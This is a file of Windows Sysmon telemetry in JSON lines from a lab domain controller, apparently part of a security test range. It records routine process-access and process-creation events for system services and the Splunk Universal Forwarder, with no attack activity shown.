{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-001009E00300}\r\nTargetProcessId: 3880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-001009E00300}","TargetProcessId":"3880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.171\r\nProcessGuid: {E2A3D6B1-106E-5F25-0000-0010C1E00300}\r\nProcessId: 3864\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106E-5F25-0000-001009E00300}\r\nParentProcessId: 3880\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.171","ProcessGuid":"{E2A3D6B1-106E-5F25-0000-0010C1E00300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106E-5F25-0000-001009E00300}","ParentProcessId":"3880","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-106E-5F25-0000-001009E00300}\r\nSourceProcessId: 3880\r\nSourceThreadId: 3876\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-106E-5F25-0000-001009E00300}","SourceProcessId":"3880","SourceThreadId":"3876","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
